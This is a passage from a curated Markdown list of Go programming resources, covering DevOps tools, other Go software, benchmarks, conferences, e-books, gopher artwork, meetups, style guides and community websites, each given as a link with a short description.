projects - aligned with Open API Specification standard.\n- [go-callvis](https://github.com/TrueFurby/go-callvis) - Visualize call graph of your Go program using dot format.\n- [go-james](https://github.com/pieterclaerhout/go-james) - Go project skeleton creator, builds and tests your projects without the manual setup.\n- [go-pkg-complete](https://github.com/skelterjohn/go-pkg-complete) - Bash completion for go and wgo.\n- [go-swagger](https://github.com/go-swagger/go-swagger) - Swagger 2.0 implementation for go. Swagger is a simple yet powerful representation of your RESTful API.\n- [godbg](https://github.com/tylerwince/godbg) - Implementation of Rusts `dbg!` macro for quick and easy debugging during development.\n- [gomodrun](https://github.com/dustinblackman/gomodrun/) - Go tool that executes and caches binaries included in go.mod files.\n- [gotemplate.io](https://gotemplate.io/) - Online tool to preview `text/template` templates live.\n- [gotestdox](https://github.com/bitfield/gotestdox) - Show Go test results as readable sentences.\n- [gothanks](https://github.com/psampaz/gothanks) - GoThanks automatically stars your go.mod github dependencies, sending this way some love to their maintainers.\n- [igo](https://github.com/rocketlaunchr/igo) - An igo to go transpiler (new language features for Go language!)\n- [modver](https://github.com/bobg/modver) - Compare two versions of a Go module to check the version-number change required (major, minor, or patchlevel), according to [semver](https://semver.org/) rules.\n- [OctoLinker](https://github.com/OctoLinker/browser-extension) - Navigate through go files efficiently with the OctoLinker browser extension for GitHub.\n- [richgo](https://github.com/kyoh86/richgo) - Enrich `go test` outputs with text decorations.\n- [roumon](https://github.com/becheran/roumon) - Monitor current state of all active goroutines via a command line interface.\n- [rts](https://github.com/galeone/rts) - RTS: response to struct. Generates Go structs from server responses.\n- [textra](https://github.com/ravsii/textra) - Extract Go struct field names, types and tags for filtering and exporting.\n- [typex](https://github.com/dtgorski/typex) - Examine Go types and their transitive dependencies, alternatively export results as TypeScript value objects (or types) declaration.\n\n**[⬆ back to top](#contents)**\n\n## Software Packages\n\n_Software written in Go._\n\n**[⬆ back to top](#contents)**\n\n### DevOps Tools\n\n- [abbreviate](https://github.com/dnnrly/abbreviate) - abbreviate is a tool turning long strings in to shorter ones with configurable separators, for example to embed branch names in to deployment stack IDs.\n- [aptly](https://github.com/smira/aptly) - aptly is a Debian repository management tool.\n- [aurora](https://github.com/xuri/aurora) - Cross-platform web-based Beanstalkd queue server console.\n- [awsenv](https://github.com/soniah/awsenv) - Small binary that loads Amazon (AWS) environment variables for a profile.\n- [Balerter](https://github.com/balerter/balerter) - A self-hosted script-based alerting manager.\n- [Blast](https://github.com/dave/blast) - A simple tool for API load testing and batch jobs.\n- [bombardier](https://github.com/codesenberg/bombardier) - Fast cross-platform HTTP benchmarking tool.\n- [bosun](https://github.com/bosun-monitor/bosun) - Time Series Alerting Framework.\n- [cassowary](https://github.com/rogerwelin/cassowary) - Modern cross-platform HTTP load-testing tool written in Go.\n- [Ddosify](https://github.com/ddosify/ddosify) - High-performance load testing tool, written in Golang.\n- [DepCharge](https://github.com/centerorbit/depcharge) - Helps orchestrating the execution of commands across the many dependencies in larger projects.\n- [docker-go-mingw](https://github.com/x1unix/docker-go-mingw) - Docker image for building Go binaries for Windows with MinGW toolchain.\n- [Dockerfile-Generator](https://github.com/ozankasikci/dockerfile-generator) - A go library and an executable that produces valid Dockerfiles using various input channels.\n- [dogo](https://github.com/liudng/dogo) - Monitoring changes in the source file and automatically compile and run (restart).\n- [drone-jenkins](https://github.com/appleboy/drone-jenkins) - Trigger downstream Jenkins jobs using a binary, docker or Drone CI.\n- [drone-scp](https://github.com/appleboy/drone-scp) - Copy files and artifacts via SSH using a binary, docker or Drone CI.\n- [Dropship](https://github.com/chrismckenzie/dropship) - Tool for deploying code via cdn.\n- [easyssh-proxy](https://github.com/appleboy/easyssh-proxy) - Golang package for easy remote execution through SSH and SCP downloading via `ProxyCommand`.\n- [fac](https://github.com/mkchoi212/fac) - Command-line user interface to fix git merge conflicts.\n- [Fleet device management](https://github.com/fleetdm/fleet) - Lightweight, programmable telemetry for servers and workstations.\n- [gaia](https://github.com/gaia-pipeline/gaia) - Build powerful pipelines in any programming language.\n- [ghorg](https://github.com/gabrie30/ghorg) - Quickly clone an entire org/users repositories into one directory - Supports GitHub, GitLab, Gitea, and Bitbucket.\n- [Gitea](https://github.com/go-gitea/gitea) - Fork of Gogs, entirely community driven.\n- [gitea-github-migrator](https://git.jonasfranz.software/JonasFranzDEV/gitea-github-migrator) - Migrate all your GitHub repositories, issues, milestones and labels to your Gitea instance.\n- [go-furnace](https://github.com/go-furnace/go-furnace) - Hosting solution written in Go. Deploy your Application with ease on AWS, GCP or DigitalOcean.\n- [go-rocket-update](https://github.com/mouuff/go-rocket-update) - A simple way to make self updating Go applications - Supports Github and Gitlab.\n- [go-selfupdate](https://github.com/sanbornm/go-selfupdate) - Enable your Go applications to self update.\n- [gobrew](https://github.com/cryptojuice/gobrew) - gobrew lets you easily switch between multiple versions of go.\n- [gobrew](https://github.com/kevincobain2000/gobrew) - Go version manager. Super simple tool to install and manage Go versions. Install go without root. Gobrew doesn't require shell rehash.\n- [godbg](https://github.com/sirnewton01/godbg) - Web-based gdb front-end application.\n- [Gogs](https://gogs.io/) - A Self Hosted Git Service in the Go Programming Language.\n- [gonative](https://github.com/inconshreveable/gonative) - Tool which creates a build of Go that can cross compile to all platforms while still using the Cgo-enabled versions of the stdlib packages.\n- [govvv](https://github.com/ahmetalpbalkan/govvv) - “go build” wrapper to easily add version information into Go binaries.\n- [gox](https://github.com/mitchellh/gox) - Dead simple, no frills Go cross compile tool.\n- [goxc](https://github.com/laher/goxc) - build tool for Go, with a focus on cross-compiling and packaging.\n- [grapes](https://github.com/yaronsumel/grapes) - Lightweight tool designed to distribute commands over ssh with ease.\n- [GVM](https://github.com/moovweb/gvm) - GVM provides an interface to manage Go versions.\n- [Hey](https://github.com/rakyll/hey) - Hey is a tiny program that sends some load to a web application.\n- [httpref](https://github.com/dnnrly/httpref) - httpref is a handy CLI reference for HTTP methods, status codes, headers, and TCP and UDP ports.\n- [jcli](https://github.com/jenkins-zh/jenkins-cli) - Jenkins CLI allows you manage your Jenkins as an easy way.\n- [kala](https://github.com/ajvb/kala) - Simplistic, modern, and performant job scheduler.\n- [kcli](https://github.com/cswank/kcli) - Command line tool for inspecting kafka topics/partitions/messages.\n- [ko](https://github.com/google/ko) - Command line tool for building and deploying Go applications on Kubernetes\n- [kool](https://github.com/kool-dev/kool) - Command line tool for managing Docker environments as an easy way.\n- [kubernetes](https://github.com/kubernetes/kubernetes) - Container Cluster Manager from Google.\n- [KubeVela](https://github.com/kubevela/kubevela) - Cloud native application delivery.\n- [kwatch](https://github.com/abahmed/kwatch) - Monitor & detect crashes in your Kubernetes(K8s) cluster instantly.\n- [lstags](https://github.com/ivanilves/lstags) - Tool and API to sync Docker images across different registries.\n- [lwc](https://github.com/timdp/lwc) - A live-updating version of the UNIX wc command.\n- [manssh](https://github.com/xwjdsh/manssh) - manssh is a command line tool for managing your ssh alias config easily.\n- [Mantil](https://github.com/mantil-io/mantil) - Go specific framework for building serverless applications on AWS that enables you to focus on pure Go code while Mantil takes care of the infrastructure.\n- [Mizu](https://github.com/up9inc/mizu) - API traffic viewer for Kubernetes enabling you to view all API communication between microservices, multiprotocol support: HTTP1.1, HTTP/2, AMQP, Kafka, Redis.\n- [Moby](https://github.com/moby/moby) - Collaborative project for the container ecosystem to assemble container-based systems.\n- [Mora](https://github.com/emicklei/mora) - REST server for accessing MongoDB documents and meta data.\n- [ostent](https://github.com/ostrost/ostent) - collects and displays system metrics and optionally relays to Graphite and/or InfluxDB.\n- [Packer](https://github.com/mitchellh/packer) - Packer is a tool for creating identical machine images for multiple platforms from a single source configuration.\n- [Pewpew](https://github.com/bengadbois/pewpew) - Flexible HTTP command line stress tester.\n- [Pomerium](https://github.com/pomerium/pomerium) - Pomerium is an identity-aware access proxy.\n- [Rodent](https://github.com/alouche/rodent) - Rodent helps you manage Go versions, projects and track dependencies.\n- [s3-proxy](https://github.com/oxyno-zeta/s3-proxy) - S3 Proxy with GET, PUT and DELETE methods and authentication (OpenID Connect and Basic Auth).\n- [s3gof3r](https://github.com/rlmcpherson/s3gof3r) - Small utility/library optimized for high speed transfer of large objects into and out of Amazon S3.\n- [s5cmd](https://github.com/peak/s5cmd) - Blazing fast S3 and local filesystem execution tool.\n- [Scaleway-cli](https://github.com/scaleway/scaleway-cli) - Manage BareMetal Servers from Command Line (as easily as with Docker).\n- [script](https://github.com/bitfield/script) - Making it easy to write shell-like scripts in Go for DevOps and system administration tasks.\n- [sg](https://github.com/ChristopherRabotin/sg) - Benchmarks a set of HTTP endpoints (like ab), with possibility to use the response code and data between each call for specific server stress based on its previous response.\n- [skm](https://github.com/TimothyYe/skm) - SKM is a simple and powerful SSH Keys Manager, it helps you to manage your multiple SSH keys easily!\n- [StatusOK](https://github.com/sanathp/statusok) - Monitor your Website and REST APIs.Get Notified through Slack, E-mail when your server is down or response time is more than expected.\n- [terraform-provider-openapi](https://github.com/dikhan/terraform-provider-openapi) - Terraform provider plugin that dynamically configures itself at runtime based on an OpenAPI document (formerly known as swagger file) containing the definitions of the APIs exposed.\n- [tf-profile](https://github.com/datarootsio/tf-profile) - Profiler for Terraform runs. Generate global stats, resource-level stats or visualizations.\n- [traefik](https://github.com/containous/traefik) - Reverse proxy and load balancer with support for multiple backends.\n- [trubka](https://github.com/xitonix/trubka) - A CLI tool to manage and troubleshoot Apache Kafka clusters with the ability of generically publishing/consuming protocol buffer and plain text events to/from Kafka.\n- [uTask](https://github.com/ovh/utask) - Automation engine that models and executes business processes declared in yaml.\n- [Vegeta](https://github.com/tsenart/vegeta) - HTTP load testing tool and library. It's over 9000!\n- [wait-for](https://github.com/dnnrly/wait-for) - Wait for something to happen (from the command line) before continuing. Easy orchestration of Docker services and other things.\n- [webhook](https://github.com/adnanh/webhook) - Tool which allows user to create HTTP endpoints (hooks) that execute commands on the server.\n- [Wide](https://wide.b3log.org/login) - Web-based IDE for Teams using Golang.\n- [winrm-cli](https://github.com/masterzen/winrm-cli) - Cli tool to remotely execute commands on Windows machines.\n\n**[⬆ back to top](#contents)**\n\n### Other Software\n\n- [Better Go Playground](https://goplay.tools) - Go playground with syntax highlight, code completion and other features.\n- [blocky](https://github.com/0xERR0R/blocky) - Fast and lightweight DNS proxy as ad-blocker for local network with many features.\n- [borg](https://github.com/crufter/borg) - Terminal based search engine for bash snippets.\n- [boxed](https://github.com/tejo/boxed) - Dropbox based blog engine.\n- [Cherry](https://github.com/rafael-santiago/cherry) - Tiny webchat server in Go.\n- [Circuit](https://github.com/gocircuit/circuit) - Circuit is a programmable platform-as-a-service (PaaS) and/or Infrastructure-as-a-Service (IaaS), for management, discovery, synchronization and orchestration of services and hosts comprising cloud applications.\n- [Comcast](https://github.com/tylertreat/Comcast) - Simulate bad network connections.\n- [confd](https://github.com/kelseyhightower/confd) - Manage local application configuration files using templates and data from etcd or consul.\n- [crawley](https://github.com/s0rg/crawley) - Web scraper/crawler for cli.\n- [croc](https://github.com/schollz/croc) - Easily and securely send files or folders from one computer to another.\n- [Docker](https://www.docker.com/) - Open platform for distributed applications for developers and sysadmins.\n- [Documize](https://github.com/documize/community) - Modern wiki software that integrates data from SaaS tools.\n- [dp](https://github.com/scryinfo/dp) - Through SDK for data exchange with blockchain, developers can get easy access to DAPP development.\n- [drive](https://github.com/odeke-em/drive) - Google Drive client for the commandline.\n- [Duplicacy](https://github.com/gilbertchen/duplicacy) - A cross-platform network and cloud backup tool based on the idea of lock-free deduplication.\n- [Gebug](https://github.com/moshebe/gebug) - A tool that makes debugging of Dockerized Go applications super easy by enabling Debugger and Hot-Reload features, seamlessly.\n- [gfile](https://github.com/Antonito/gfile) - Securely transfer files between two computers, without any third party, over WebRTC.\n- [Go Package Store](https://github.com/shurcooL/Go-Package-Store) - App that displays updates for the Go packages in your GOPATH.\n- [go-peerflix](https://github.com/Sioro-Neoku/go-peerflix) - Video streaming torrent client.\n- [goblin](https://goblin.reaper.im) - Golang binaries in a curl, built by goblins.\n- [GoBoy](https://github.com/Humpheh/goboy) - Nintendo Game Boy Color emulator written in Go.\n- [gocc](https://github.com/goccmack/gocc) - Gocc is a compiler kit for Go written in Go.\n- [GoDocTooltip](https://github.com/diankong/GoDocTooltip) - Chrome extension for Go Doc sites, which shows function description as tooltip at function list.\n- [Gokapi](https://github.com/Forceu/gokapi) - Lightweight server to share files, which expire after a set amount of downloads or days. Similar to Firefox Send, but without public upload.\n- [GoLand](https://jetbrains.com/go) - Full featured cross-platform Go IDE.\n- [GoNB](https://github.com/janpfeifer/gonb) - Interactive Go programming with Jupyter Notebooks (also works in VSCode, Binder and Google's Colab).\n- [Gor](https://github.com/buger/gor) - Http traffic replication tool, for replaying traffic from production to stage/dev environments in real-time.\n- [Guora](https://github.com/meloalright/guora) - A self-hosted Quora like web application written in Go.\n- [hoofli](https://github.com/dnnrly/hoofli) - Generate PlantUML diagrams from Chrome or Firefox network inspections.\n- [hotswap](https://github.com/edwingeng/hotswap) - A complete solution to reload your go code without restarting your server, interrupting or blocking any ongoing procedure.\n- [hugo](https://gohugo.io/) - Fast and Modern Static Website Engine.\n- [ide](https://github.com/thestrukture/ide) - Browser accessible IDE. Designed for Go with Go.\n- [ipe](https://github.com/dimiro1/ipe) - Open source Pusher server implementation compatible with Pusher client libraries written in GO.\n- [joincap](https://github.com/assafmo/joincap) - Command-line utility for merging multiple pcap files together.\n- [Juju](https://jujucharms.com/) - Cloud-agnostic service deployment and orchestration - supports EC2, Azure, Openstack, MAAS and more.\n- [Leaps](https://github.com/jeffail/leaps) - Pair programming service using Operational Transforms.\n- [lgo](https://github.com/yunabe/lgo) - Interactive Go programming with Jupyter. It supports code completion, code inspection and 100% Go compatibility.\n- [limetext](https://limetext.github.io) - Lime Text is a powerful and elegant text editor primarily developed in Go that aims to be a Free and open-source software successor to Sublime Text.\n- [LiteIDE](https://github.com/visualfc/liteide) - LiteIDE is a simple, open source, cross-platform Go IDE.\n- [mockingjay](https://github.com/quii/mockingjay-server) - Fake HTTP servers and consumer driven contracts from one configuration file. You can also make the server randomly misbehave to help do more realistic performance tests.\n- [myLG](https://github.com/mehrdadrad/mylg) - Command Line Network Diagnostic tool written in Go.\n- [naclpipe](https://github.com/unix4fun/naclpipe) - Simple NaCL EC25519 based crypto pipe tool written in Go.\n- [Neo-cowsay](https://github.com/Code-Hex/Neo-cowsay) - 🐮 cowsay is reborn. for a New Era.\n- [nes](https://github.com/fogleman/nes) - Nintendo Entertainment System (NES) emulator written in Go.\n- [Orbit](https://github.com/gulien/orbit) - A simple tool for running commands and generating files from templates.\n- [peg](https://github.com/pointlander/peg) - Peg, Parsing Expression Grammar, is an implementation of a Packrat parser generator.\n- [Plik](https://github.com/root-gg/plik) - Plik is a temporary file upload system (Wetransfer like) in Go.\n- [portal](https://github.com/SpatiumPortae/portal) - Portal is a quick and easy command-line file transfer utility from any computer to another.\n- [protoncheck](https://github.com/servusdei2018/protoncheck) - ProtonMail module for waybar/polybar/yabar/i3blocks.\n- [restic](https://github.com/restic/restic) - De-duplicating backup program.\n- [sake](https://github.com/alajmo/sake) - sake is a command runner for local and remote hosts.\n- [scc](https://github.com/boyter/scc) - Sloc Cloc and Code, a very fast accurate code counter with complexity calculations and COCOMO estimates.\n- [Seaweed File System](https://github.com/chrislusf/seaweedfs) - Fast, Simple and Scalable Distributed File System with O(1) disk seek.\n- [shell2http](https://github.com/msoap/shell2http) - Executing shell commands via http server (for prototyping or remote control).\n- [snap](https://github.com/intelsdi-x/snap) - Powerful telemetry framework.\n- [Snitch](https://github.com/lucasgomide/snitch) - Simple way to notify your team and many tools when someone has deployed any application via Tsuru.\n- [Stack Up](https://github.com/pressly/sup) - Stack Up, a super simple deployment tool - just Unix - think of it like 'make' for a network of servers.\n- [stew](https://github.com/marwanhawari/stew) - An independent package manager for compiled binaries.\n- [syncthing](https://syncthing.net/) - Open, decentralized file synchronization tool and protocol.\n- [tcpdog](https://github.com/mehrdadrad/tcpdog) - eBPF based TCP observability.\n- [tcpprobe](https://github.com/mehrdadrad/tcpprobe) - TCP tool for network performance and path monitoring, including socket statistics.\n- [term-quiz](https://github.com/crazcalm/term-quiz) - Quizzes for your terminal.\n- [toxiproxy](https://github.com/shopify/toxiproxy) - Proxy to simulate network and system conditions for automated tests.\n- [tsuru](https://tsuru.io/) - Extensible and open source Platform as a Service software.\n- [vaku](https://github.com/lingrino/vaku) - CLI & API for folder-based functions in Vault like copy, move, and search.\n- [vFlow](https://github.com/VerizonDigital/vflow) - High-performance, scalable and reliable IPFIX, sFlow and Netflow collector.\n- [wellington](https://github.com/wellington/wellington) - Sass project management tool, extends the language with sprite functions (like Compass).\n- [woke](https://github.com/get-woke/woke) - Detect non-inclusive language in your source code.\n- [zs](https://git.mills.io/prologic/zs) - an extremely minimal static site generator.\n\n**[⬆ back to top](#contents)**\n\n# Resources\n\n_Where to discover new Go libraries._\n\n**[⬆ back to top](#contents)**\n\n## Benchmarks\n\n- [autobench](https://github.com/davecheney/autobench) - Framework to compare the performance between different Go versions.\n- [go-benchmark-app](https://github.com/mrLSD/go-benchmark-app) - Powerful HTTP-benchmark tool mixed with Аb, Wrk, Siege tools. Gathering statistics and various parameters for benchmarks and comparison results.\n- [go-benchmarks](https://github.com/tylertreat/go-benchmarks) - Few miscellaneous Go microbenchmarks. Compare some language features to alternative approaches.\n- [go-http-routing-benchmark](https://github.com/julienschmidt/go-http-routing-benchmark) - Go HTTP request router benchmark and comparison.\n- [go-json-benchmark](https://github.com/zerosnake0/go-json-benchmark) - Go JSON benchmark.\n- [go-ml-benchmarks](https://github.com/nikolaydubina/go-ml-benchmarks) - benchmarks for machine learning inference in Go.\n- [go-web-framework-benchmark](https://github.com/smallnest/go-web-framework-benchmark) - Go web framework benchmark.\n- [go_serialization_benchmarks](https://github.com/alecthomas/go_serialization_benchmarks) - Benchmarks of Go serialization methods.\n- [gocostmodel](https://github.com/PuerkitoBio/gocostmodel) - Benchmarks of common basic operations for the Go language.\n- [golang-sql-benchmark](https://github.com/tyler-smith/golang-sql-benchmark) - Collection of benchmarks for popular Go database/SQL utilities.\n- [gospeed](https://github.com/feyeleanor/GoSpeed) - Go micro-benchmarks for calculating the speed of language constructs.\n- [kvbench](https://github.com/jimrobinson/kvbench) - Key/Value database benchmark.\n- [skynet](https://github.com/atemerev/skynet) - Skynet 1M threads microbenchmark.\n- [speedtest-resize](https://github.com/fawick/speedtest-resize) - Compare various Image resize algorithms for the Go language.\n\n**[⬆ back to top](#contents)**\n\n## Conferences\n\n- [GoCon](https://gocon.connpass.com/) - Tokyo, Japan.\n- [GoDays](https://www.godays.io/) - Berlin, Germany.\n- [GoLab](https://golab.io/) - Florence, Italy.\n- [GopherChina](https://gopherchina.org) - Shanghai, China.\n- [GopherCon](https://www.gophercon.com/) - Denver, USA.\n- [GopherCon Australia](https://gophercon.com.au/) - Sydney, Australia.\n- [GopherCon Brazil](https://gopherconbr.org) - Florianópolis, Brazil.\n- [GopherCon Europe](https://gophercon.eu/) - Berlin, Germany.\n- [GopherCon India](https://www.gophercon.in/) - Pune, India.\n- [GopherCon Israel](https://www.gophercon.org.il/) - Tel Aviv, Israel.\n- [GopherCon Russia](https://www.gophercon-russia.ru) - Moscow, Russia.\n- [GopherCon Singapore](https://gophercon.sg) - Mapletree Business City, Singapore.\n- [GopherCon UK](https://www.gophercon.co.uk/) - London, UK.\n- [GopherCon Vietnam](https://gophercon.vn/) - Ho Chi Minh City, Vietnam.\n- [GoWest Conference](https://www.gowestconf.com/) - Lehi, USA.\n\n**[⬆ back to top](#contents)**\n\n## E-Books\n\n### E-books for purchase\n\n- [100 Go Mistakes: How to Avoid Them](https://www.manning.com/books/100-go-mistakes-how-to-avoid-them)\n- [Black Hat Go](https://nostarch.com/blackhatgo) - Go programming for hackers and pentesters.\n- [Build an Orchestrator in Go](https://www.manning.com/books/build-an-orchestrator-in-go)\n- [Continuous Delivery in Go](https://www.manning.com/books/continuous-delivery-in-go) - This practical guide to continuous delivery shows you how to rapidly establish an automated pipeline that will improve your testing, code quality, and final product.\n- [Creative DIY Microcontroller Project With TinyGo and WebAssembly](https://www.packtpub.com/product/creative-diy-microcontroller-projects-with-tinygo-and-webassembly/9781800560208) - An introduction into the TinyGo compiler with projects involving Arduino and WebAssembly.\n- [Effective Go: Elegant, efficient, and testable code](https://www.manning.com/books/effective-go) - Unlock Go’s unique perspective on program design, and start writing simple, maintainable, and testable Go code.\n- [For the Love of Go](https://bitfieldconsulting.com/books/love) - An introductory book for Go beginners.\n- [Go Faster](https://leanpub.com/gofaster) - This book seeks to shorten your learning curve and help you become a proficient Go programmer, faster.\n- [Know Go: Generics](https://bitfieldconsulting.com/books/generics) - A guide to understanding and using generics in Go.\n- [Lets-Go](https://lets-go.alexedwards.net) - A step-by-step guide to creating fast, secure and maintanable web applications with Go.\n- [Lets-Go-Further](https://lets-go-further.alexedwards.net) - Advanced patterns for building APIs and web applications in Go.\n- [The Power of Go: Tests](https://bitfieldconsulting.com/books/tests) - A guide to testing in Go.\n- [The Power of Go: Tools](https://bitfieldconsulting.com/books/tools) - A guide to writing command-line tools in Go.\n- [Writing A Compiler In Go](https://compilerbook.com)\n- [Writing An Interpreter In Go](https://interpreterbook.com) - Book that introduces dozens of techniques for writing idiomatic, expressive, and efficient Go code that avoids common pitfalls.\n\n### Free e-books\n\n- [A Go Developer's Notebook](https://leanpub.com/GoNotebook/read)\n- [An Introduction to Programming in Go](http://www.golang-book.com/)\n- [Build Web Application with Golang](https://astaxie.gitbooks.io/build-web-application-with-golang/content/en/)\n- [Building Web Apps With Go](https://codegangsta.gitbooks.io/building-web-apps-with-go/content/)\n- [Go 101](https://go101.org) - A book focusing on Go syntax/semantics and all kinds of details.\n- [Go AST Book (Chinese)](https://github.com/chai2010/go-ast-book) - A book focusing on Go `go/*` packages.\n- [Go Succinctly](https://github.com/thedevsir/gosuccinctly) - in Persian.\n- [GoBooks](https://github.com/dariubs/GoBooks) - A curated list of Go books.\n- [How To Code in Go eBook](https://www.digitalocean.com/community/books/how-to-code-in-go-ebook) - A 600 page introduction to Go aimed at first time developers.\n- [Learning Go](https://www.miek.nl/downloads/Go/Learning-Go-latest.pdf)\n- [Network Programming With Go](https://jan.newmarch.name/golang/)\n- [Practical Go Lessons](https://www.practical-go-lessons.com/)\n- [Spaceship Go A Journey to the Standard Library](https://blasrodri.github.io/spaceship-go-gh-pages/)\n- [The Go Programming Language](https://www.gopl.io/)\n- [The Golang Standard Library by Example (Chinese)](https://github.com/polaris1119/The-Golang-Standard-Library-by-Example)\n- [Web Application with Go the Anti-Textbook](https://github.com/thewhitetulip/web-dev-golang-anti-textbook/)\n\n**[⬆ back to top](#contents)**\n\n## Gophers\n\n- [Free Gophers Pack](https://github.com/MariaLetta/free-gophers-pack) - Gopher graphics pack by Maria Letta with illustrations and emotional characters in vector and raster.\n- [Go-gopher-Vector](https://github.com/keygx/Go-gopher-Vector) - Go gopher Vector Data [.ai, .svg].\n- [gopher-logos](https://github.com/GolangUA/gopher-logos) - adorable gopher logos.\n- [gopher-stickers](https://github.com/tenntenn/gopher-stickers)\n- [gophericons](https://github.com/shalakhin/gophericons)\n- [gopherize.me](https://github.com/matryer/gopherize.me) - Gopherize yourself.\n- [gophers](https://github.com/ashleymcnamara/gophers) - Gopher artworks by Ashley McNamara.\n- [gophers](https://github.com/egonelbre/gophers) - Free gophers.\n- [gophers](https://github.com/rogeralsing/gophers) - random gopher graphics.\n- [gophers](https://github.com/sillecelik/go-gopher) - Gopher amigurumi toy pattern.\n- [gophers](https://github.com/scraly/gophers) - Gophers by Aurélie Vache.\n\n**[⬆ back to top](#contents)**\n\n## Meetups\n\n- [Basel Go Meetup](https://www.meetup.com/Basel-Go-Meetup/)\n- [Belfast Gophers](https://www.meetup.com/Belfast-Gophers/)\n- [Belgrade Golang Meetup](https://www.meetup.com/golang-serbia/)\n- [Berlin Golang](https://www.meetup.com/golang-users-berlin/)\n- [Brisbane Gophers](https://www.meetup.com/Brisbane-Golang-Meetup/)\n- [Canberra Gophers](https://www.meetup.com/Canberra-Gophers/)\n- [Go Language NYC](https://www.meetup.com/golanguagenewyork/)\n- [Go London User Group](https://www.meetup.com/Go-London-User-Group/)\n- [Go Remote Meetup](https://www.meetup.com/Go-Remote-Meetup/)\n- [Go Toronto](https://www.meetup.com/go-toronto/)\n- [Go User Group Atlanta](https://www.meetup.com/Go-Users-Group-Atlanta/)\n- [GoBandung](https://www.meetup.com/GoBandung/)\n- [GoBridge, San Francisco, CA](https://www.meetup.com/gobridge/)\n- [GoCracow - Krakow, Poland](https://www.meetup.com/GoCracow/)\n- [GoJakarta](https://www.meetup.com/GoJakarta/)\n- [Golang Amsterdam](https://www.meetup.com/golang-amsterdam/)\n- [Golang Argentina](https://www.meetup.com/Golang-Argentina/)\n- [Golang Athens](https://www.meetup.com/Athens-Gophers/)\n- [Golang Baltimore, MD](https://www.meetup.com/BaltimoreGolang/)\n- [Golang Bangalore](https://www.meetup.com/Golang-Bangalore/)\n- [Golang Belo Horizonte - Brazil](https://www.meetup.com/go-belo-horizonte/)\n- [Golang Boston](https://www.meetup.com/bostongo/)\n- [Golang Bulgaria](https://www.meetup.com/Golang-Bulgaria/)\n- [Golang Cardiff, UK](https://www.meetup.com/Cardiff-Go-Meetup/)\n- [Golang Copenhagen](https://www.meetup.com/Go-Cph/)\n- [Golang Curitiba - Brazil](https://www.meetup.com/GolangCWB/)\n- [Golang DC, Arlington, VA](https://www.meetup.com/Golang-DC/)\n- [Golang Dorset, UK](https://www.meetup.com/golang-dorset/)\n- [Golang Estonia](https://www.meetup.com/Golang-Estonia/)\n- [Golang Gurgaon, India](https://www.meetup.com/Gurgaon-Go-Meetup/)\n- [Golang Hamburg - Germany](https://www.meetup.com/Go-User-Group-Hamburg/)\n- [Golang Israel](https://www.meetup.com/Go-Israel/)\n- [Golang Kathmandu](https://www.meetup.com/Golang-Kathmandu/)\n- [Golang Korea](https://www.meetup.com/GDG-Golang-Korea/)\n- [Golang Lima - Peru](https://www.meetup.com/Golang-Peru/)\n- [Golang Lyon](https://www.meetup.com/Golang-Lyon/)\n- [Golang Marseille](https://www.meetup.com/fr-FR/Golang-Marseille/)\n- [Golang Melbourne](https://www.meetup.com/golang-mel/)\n- [Golang Mountain View](https://www.meetup.com/Golang-Mountain-View/)\n- [Golang North East](https://www.meetup.com/en-AU/Golang-North-East/)\n- [Golang Paris](https://www.meetup.com/Golang-Paris/)\n- [Golang Poland](https://www.meetup.com/Golang-Poland/)\n- [Golang Pune](https://www.meetup.com/Golang-Pune/)\n- [Golang Rotterdam](https://www.meetup.com/golang-rotterdam/)\n- [Golang Singapore](https://www.meetup.com/golangsg/)\n- [Golang Stockholm](https://www.meetup.com/Go-Stockholm/)\n- [Golang Sydney, AU](https://www.meetup.com/golang-syd/)\n- [Golang São Paulo - Brazil](https://www.meetup.com/golangbr/)\n- [Golang Taipei](https://www.meetup.com/golang-taipei-meetup/)\n- [Golang Thessaloniki](https://www.meetup.com/thessaloniki-golang-meetup/)\n- [Golang Turkey](https://kommunity.com/goturkiye)\n- [Golang Vancouver, BC](https://www.meetup.com/golangvan/)\n- [Golang Vienna, Austria](https://www.meetup.com/viennago/)\n- [Golang Москва](https://www.meetup.com/Golang-Moscow/)\n- [GoSF - San Francisco, CA](https://www.meetup.com/golangsf)\n- [Istanbul Golang](https://www.meetup.com/Istanbul-Golang/)\n- [Seattle Go Programmers](https://www.meetup.com/golang/)\n- [Ukrainian Golang User Groups](https://www.meetup.com/uagolang/)\n- [Utah Go User Group](https://www.meetup.com/utahgophers/)\n- [Women Who Go - San Francisco, CA](https://www.meetup.com/Women-Who-Go/)\n\n_Add the group of your city/country here (send **PR**)_\n\n**[⬆ back to top](#contents)**\n\n## Style Guides\n\n- [bahlo/go-styleguide](https://github.com/bahlo/go-styleguide)\n- [CockroachDB](https://github.com/cockroachdb/cockroach/blob/master/docs/style.md)\n- [GitLab](https://docs.gitlab.com/ee/development/go_guide/)\n- [Google](https://google.github.io/styleguide/go/)\n- [Hyperledger](https://github.com/hyperledger/fabric/blob/release-1.4/docs/source/style-guides/go-style.rst)\n- [Magnetico](https://github.com/boramalper/magnetico/wiki/magnetico-Design-Specification)\n- [Sourcegraph](https://docs.sourcegraph.com/dev/background-information/languages/go)\n- [Thanos](https://thanos.io/tip/contributing/coding-style-guide.md/)\n- [Trybe](https://github.com/betrybe/playbook-go/blob/main/README_EN.md)\n- [Uber](https://github.com/uber-go/guide/blob/master/style.md)\n\n**[⬆ back to top](#contents)**\n\n## Social Media\n\n### Twitter\n\n- [@GoDiscussions](https://twitter.com/GoDiscussions)\n- [@golang](https://twitter.com/golang)\n- [@golang_news](https://twitter.com/golang_news)\n- [@golangch](https://twitter.com/golangch)\n- [@golangflow](https://twitter.com/golangflow)\n- [@golangweekly](https://twitter.com/golangweekly)\n\n**[⬆ back to top](#contents)**\n\n### Reddit\n\n- [r/golang](https://www.reddit.com/r/golang/)\n\n**[⬆ back to top](#contents)**\n\n## Websites\n\n- [Awesome Go @LibHunt](https://go.libhunt.com) - Your go-to Go Toolbox.\n- [Awesome Golang Workshops](https://github.com/amit-davidson/awesome-golang-workshops) - A curated list of awesome golang workshops.\n- [Awesome Remote Job](https://github.com/lukasz-madon/awesome-remote-job) - Curated list of awesome remote jobs. A lot of them are looking for Go hackers.\n- [awesome-awesomeness](https://github.com/bayandin/awesome-awesomeness) - List of other amazingly awesome lists.\n- [awesome-go-extra](https://github.com/xwjdsh/awesome-go-extra) - Parse awesome-go README file and generate a new README file with repo info.\n- [Code with Mukesh](https://codewithmukesh.com/blog/category/golang) - Software Engineer and Blogs @ codewithmukesh.com.\n- [Coding Mystery](https://codingmystery.com) - Solve exciting escape-room-inspired programming challenges using Go.\n- 